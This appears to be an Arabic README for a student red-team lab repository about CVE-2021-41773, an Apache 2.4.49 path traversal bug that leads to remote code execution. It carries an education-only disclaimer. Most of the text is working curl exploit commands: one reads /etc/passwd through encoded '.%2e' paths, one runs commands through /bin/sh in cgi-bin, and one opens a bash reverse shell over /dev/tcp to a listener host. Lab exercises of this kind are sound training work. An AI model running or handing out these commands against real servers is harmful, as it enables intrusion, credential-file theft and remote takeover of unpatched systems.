
Apache 2.4.49 اجتياز المسار RCE
ITSOLERA قسم الأمن السيبراني — مهمة الفريق الأحمر رقم 3
الفريق: Offensive Team Zeta
التاريخ: 18 مارس 2026
هذا المستودع هو لأغراض تعليمية فقط.
تم إجراء جميع الاختبارات في مختبر Docker محلي معزول.
لا تستخدمه أبدًا ضد الأنظمة الحية أو الإنتاجية أو التابعة لجهات خارجية.
| الحقل | التفاصيل |
|---|
| معرف CVE | CVE-2021-41773 |
| CVSS | 9.8 بالغ الأهمية |
| المتأثر | Apache HTTP Server 2.4.49 فقط |
| النوع | اختراق المسار + تنفيذ التعليمات البرمجية عن بُعد |
| تم الإصلاح في | Apache 2.4.51 |
| الملف | الوصف |
|---|---|
poc_41773.py | نص برمجي PoC بلغة بايثون مع شعار فريق زيتا |
docker-compose.yml | إعداد بيئة مختبر ضعيفة |
offensive_zeta_shell.txt | سجل الجلسة المباشرة — دليل على الاستغلال |
screenshots/ | لقطات شاشة الأدلة |
Offensive_Team_Zeta_FINAL_Report.pdf | تقرير الاستغلال الكامل |
# سحب الصورة الضعيفة
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# بدء المختبر
docker-compose up -d
# التحقق من تشغيل Apache 2.4.49
curl -I http://localhost:8080/
# يجب أن يظهر: Server: Apache/2.4.49
# قراءة ملف عبر اختراق المسار
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# تنفيذ التعليمات البرمجية عن بُعد
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# شل عكسي (استبدل IP بعنوان جهازك)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"